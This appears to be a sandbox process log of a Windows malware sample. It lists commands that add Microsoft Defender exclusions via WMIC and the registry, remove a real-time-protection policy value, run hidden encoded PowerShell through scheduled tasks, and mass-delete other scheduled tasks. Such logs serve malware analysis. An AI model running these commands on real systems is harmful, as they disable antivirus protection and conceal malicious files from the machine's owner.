C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gpEXrekzk" /SC once /ST 01:39:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:1916

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gpEXrekzk"
2⤵
PID:1436

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gpEXrekzk"
2⤵
PID:916

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
2⤵
PID:2052

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
3⤵
PID:1088

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2228

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1676

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dkHlCbgnIThowMMU" /t REG_DWORD /d 0 /reg:32
2⤵
PID:912

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dkHlCbgnIThowMMU" /t REG_DWORD /d 0 /reg:32
3⤵
- Windows security bypass
PID:2884

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dkHlCbgnIThowMMU" /t REG_DWORD /d 0 /reg:64
2⤵
PID:2184

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dkHlCbgnIThowMMU" /t REG_DWORD /d 0 /reg:64
3⤵
- Windows security bypass
PID:1992

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dkHlCbgnIThowMMU" /t REG_DWORD /d 0 /reg:32
2⤵
PID:1488

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dkHlCbgnIThowMMU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1996

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dkHlCbgnIThowMMU" /t REG_DWORD /d 0 /reg:64
2⤵
PID:1944

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dkHlCbgnIThowMMU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:560

C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\dkHlCbgnIThowMMU\BJMBtNcw\zjtYbNKrCOnFnEdF.wsf"
2⤵
PID:2080

C:\Windows\SysWOW64\wscript.exe
wscript "C:\Windows\Temp\dkHlCbgnIThowMMU\BJMBtNcw\zjtYbNKrCOnFnEdF.wsf"
2⤵
PID:2668

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EkAcBLsehYBU2" /t REG_DWORD /d 0 /reg:32
3⤵
- Windows security bypass
PID:2180

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EkAcBLsehYBU2" /t REG_DWORD /d 0 /reg:64
3⤵
- Windows security bypass
PID:2012

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LjPBjCkxU" /t REG_DWORD /d 0 /reg:32
3⤵
- Windows security bypass
PID:1248

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LjPBjCkxU" /t REG_DWORD /d 0 /reg:64
3⤵
- Windows security bypass
PID:1596

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WEPOREuymMJJC" /t REG_DWORD /d 0 /reg:32
3⤵
- Windows security bypass
PID:2676

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WEPOREuymMJJC" /t REG_DWORD /d 0 /reg:64
3⤵
- Windows security bypass
PID:2552

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wUkIgIyvDvCODvDfVpR" /t REG_DWORD /d 0 /reg:32
3⤵
- Windows security bypass
PID:2488

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wUkIgIyvDvCODvDfVpR" /t REG_DWORD /d 0 /reg:64
3⤵
- Windows security bypass
PID:2560

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yyjtaGBLEqUn" /t REG_DWORD /d 0 /reg:32
3⤵
- Windows security bypass
PID:2516

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yyjtaGBLEqUn" /t REG_DWORD /d 0 /reg:64
3⤵
- Windows security bypass
PID:2328

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PtxASTBQXXYOENVB" /t REG_DWORD /d 0 /reg:32
3⤵
- Windows security bypass
PID:2600

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PtxASTBQXXYOENVB" /t REG_DWORD /d 0 /reg:64
3⤵
- Windows security bypass
PID:2792

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
- Windows security bypass
PID:1256

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
- Windows security bypass
PID:1656

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\boSLTBXAavlTIcMXJ" /t REG_DWORD /d 0 /reg:32
3⤵
- Windows security bypass
PID:804

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\boSLTBXAavlTIcMXJ" /t REG_DWORD /d 0 /reg:64
3⤵
- Windows security bypass
PID:1556

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dkHlCbgnIThowMMU" /t REG_DWORD /d 0 /reg:32
3⤵
- Windows security bypass
PID:1832

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dkHlCbgnIThowMMU" /t REG_DWORD /d 0 /reg:64
3⤵
- Windows security bypass
PID:2304

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EkAcBLsehYBU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1632

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EkAcBLsehYBU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2308

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LjPBjCkxU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2100

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LjPBjCkxU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2348

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WEPOREuymMJJC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2752

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WEPOREuymMJJC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2064

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wUkIgIyvDvCODvDfVpR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:540

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wUkIgIyvDvCODvDfVpR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1412

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yyjtaGBLEqUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1540

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yyjtaGBLEqUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1780

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PtxASTBQXXYOENVB" /t REG_DWORD /d 0 /reg:32
3⤵
PID:856

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PtxASTBQXXYOENVB" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2640

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1936

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2844

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\boSLTBXAavlTIcMXJ" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2628

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\boSLTBXAavlTIcMXJ" /t REG_DWORD /d 0 /reg:64
3⤵
PID:640

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dkHlCbgnIThowMMU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1648

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dkHlCbgnIThowMMU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2320

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gimIjQLhT" /SC once /ST 02:20:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:1108

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gimIjQLhT"
2⤵
PID:2908

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gimIjQLhT"
2⤵
PID:1944

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
2⤵
PID:2080

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
3⤵
PID:1644

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
2⤵
PID:2168

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
3⤵
PID:2240

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "iYllYzWOsJAFFfwAw"
2⤵
PID:1500

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "iYllYzWOsJAFFfwAw"
2⤵
PID:1248

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "iYllYzWOsJAFFfwAw2"
2⤵
PID:892

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "iYllYzWOsJAFFfwAw2"
2⤵
PID:2520

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "fPtQZVBGyPdaKQTOv"
2⤵
PID:2672

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "fPtQZVBGyPdaKQTOv"
2⤵
PID:2368

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "fPtQZVBGyPdaKQTOv2"
2⤵
PID:888

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "fPtQZVBGyPdaKQTOv2"
2⤵
PID:2356

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "BCnLzkyOLZmLmIzwE"
2⤵
PID:2948

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "BCnLzkyOLZmLmIzwE"
2⤵
PID:2788

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "BCnLzkyOLZmLmIzwE2"
2⤵
PID:2568

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "BCnLzkyOLZmLmIzwE2"
2⤵
PID:2924

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "KuLOMfOQwGIIxjPQo"
2⤵
PID:2124

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "KuLOMfOQwGIIxjPQo"
2⤵
PID:2988

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "KuLOMfOQwGIIxjPQo2"
2⤵
PID:1724

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "KuLOMfOQwGIIxjPQo2"
2⤵
PID:1656

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "QpHLEFsCJKnqdWiFQ"
2⤵
PID:2136

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "QpHLEFsCJKnqdWiFQ"
2⤵
PID:1588

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "QpHLEFsCJKnqdWiFQ2"
2⤵
PID:2060

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "QpHLEFsCJKnqdWiFQ2"
2⤵
PID:852

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "JjLlOQoXGuQPCUatX"
2⤵
PID:276

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "JjLlOQoXGuQPCUatX"
2⤵
PID:2108

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "JjLlOQoXGuQPCUatX2"
2⤵
PID:2232

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "JjLlOQoXGuQPCUatX2"
2⤵
PID:2456

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "ahBPwJtarfivgyQCX"
2⤵
PID:336

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ahBPwJtarfivgyQCX"
2⤵
PID:2348

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "ahBPwJtarfivgyQCX2"
2⤵
PID:1792

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ahBPwJtarfivgyQCX2"
2⤵
PID:1420

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "dSEsiSMbbyMjmgUXi"
2⤵
PID:2276

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "dSEsiSMbbyMjmgUXi"
2⤵
PID:1148

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "dSEsiSMbbyMjmgUXi2"
2⤵
PID:1540

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "dSEsiSMbbyMjmgUXi2"
2⤵
PID:1412

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "lxqfHZMYglidBLlwk"
2⤵
PID:1080

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "lxqfHZMYglidBLlwk"
2⤵
PID:2624

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "lxqfHZMYglidBLlwk2"
2⤵
PID:1684

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "lxqfHZMYglidBLlwk2"
2⤵
PID:3052

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "GgtgzPiQnzQTXdKHD"
2⤵
PID:2164

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "GgtgzPiQnzQTXdKHD"
2⤵
PID:2628

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "GgtgzPiQnzQTXdKHD2"
2⤵
PID:656

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "GgtgzPiQnzQTXdKHD2"
2⤵
PID:352

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "hSKXczqQgUSiKyBIq"
2⤵
PID:2668

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "hSKXczqQgUSiKyBIq"
2⤵
PID:588

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "hSKXczqQgUSiKyBIq2"
2⤵
PID:2976

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "hSKXczqQgUSiKyBIq2"
2⤵
PID:612

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "USQKnjDrryqfkhdiY"
2⤵
PID:2980

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "USQKnjDrryqfkhdiY"
2⤵
PID:2856

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "USQKnjDrryqfkhdiY2"
2⤵
PID:452

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "USQKnjDrryqfkhdiY2"
2⤵
PID:1676

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "yUsQetiTYqwFtrFXE"
2⤵
PID:2836

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "yUsQetiTYqwFtrFXE"
2⤵
PID:2900

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "yUsQetiTYqwFtrFXE2"
2⤵
PID:876

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "yUsQetiTYqwFtrFXE2"
2⤵
PID:2184

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "oNisdINIjIDgGJWJp"
2⤵
PID:748

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "oNisdINIjIDgGJWJp"
2⤵
PID:1464

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "oNisdINIjIDgGJWJp2"
2⤵
PID:1088

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "oNisdINIjIDgGJWJp2"
2⤵
PID:1980

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "FflikJmsVSrpAnzdm"
2⤵
PID:1960

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "FflikJmsVSrpAnzdm"
2⤵
PID:896

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "FflikJmsVSrpAnzdm2"
2⤵
PID:1668

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "FflikJmsVSrpAnzdm2"
2⤵
PID:2244

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "bhrRzeLjFMONelYUe"
2⤵
PID:1500

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bhrRzeLjFMONelYUe"
2⤵
PID:1600

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "bhrRzeLjFMONelYUe2"
2⤵
PID:1508

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bhrRzeLjFMONelYUe2"
2⤵
PID:1596

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "zFCxEKyYfHZqHRxXg"
2⤵
PID:2480

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "zFCxEKyYfHZqHRxXg"
2⤵
PID:2376

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "zFCxEKyYfHZqHRxXg2"
2⤵
PID:2472

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "zFCxEKyYfHZqHRxXg2"
2⤵
PID:1652

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "tRrjoTQcDsRkclAsy"
2⤵
PID:2832

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "tRrjoTQcDsRkclAsy"
2⤵
PID:2600

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "tRrjoTQcDsRkclAsy2"
2⤵
PID:2560

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "tRrjoTQcDsRkclAsy2"
2⤵
PID:1364

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "zoWzbtLxqmMmTAlSq"
2⤵
PID:2120

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "zoWzbtLxqmMmTAlSq"
2⤵
PID:2104

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "zoWzbtLxqmMmTAlSq2"
2⤵
PID:2756

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "zoWzbtLxqmMmTAlSq2"
2⤵
PID:1532

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "DRTidHIeKPheRAMyM"
2⤵
PID:1556

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "DRTidHIeKPheRAMyM"
2⤵
PID:1520

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "DRTidHIeKPheRAMyM2"
2⤵
PID:2068

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "DRTidHIeKPheRAMyM2"
2⤵
PID:1512

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "FbVloGRvRXpHpvUoC"
2⤵
PID:2352

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "FbVloGRvRXpHpvUoC"
2⤵
PID:1880

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "FbVloGRvRXpHpvUoC2"
2⤵
PID:2232

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "FbVloGRvRXpHpvUoC2"
2⤵
PID:2308

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "DmubMkhxcDoElzROBpi"
2⤵
PID:2020

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "DmubMkhxcDoElzROBpi"
2⤵
PID:2348

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "DmubMkhxcDoElzROBpi2"
2⤵
PID:2752

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "DmubMkhxcDoElzROBpi2"
2⤵
PID:1420

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "gTSPEAyXWRBkgECtlmW"
2⤵
PID:1460

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gTSPEAyXWRBkgECtlmW"
2⤵
PID:1148

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "gTSPEAyXWRBkgECtlmW2"
2⤵
PID:2128

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gTSPEAyXWRBkgECtlmW2"
2⤵
PID:1892

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "DgPohQYoFstDEAukEvE"
2⤵
PID:1080

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "DgPohQYoFstDEAukEvE"
2⤵
PID:2640

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "DgPohQYoFstDEAukEvE2"
2⤵
PID:2652

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "DgPohQYoFstDEAukEvE2"
2⤵
PID:3052

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "pUflfRSniGOrkEioyUk"
2⤵
PID:2164

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "pUflfRSniGOrkEioyUk"
2⤵
PID:2628

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "pUflfRSniGOrkEioyUk2"
2⤵
PID:788

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "pUflfRSniGOrkEioyUk2"
2⤵
PID:3068

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "myNYhcWULdyyuqVeOLR"
2⤵
PID:2484

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "myNYhcWULdyyuqVeOLR"
2⤵
PID:2692

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "myNYhcWULdyyuqVeOLR2"
2⤵
PID:1108

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "myNYhcWULdyyuqVeOLR2"
2⤵
PID:2908

C:\Windows\SysWOW64\schtasks.exe
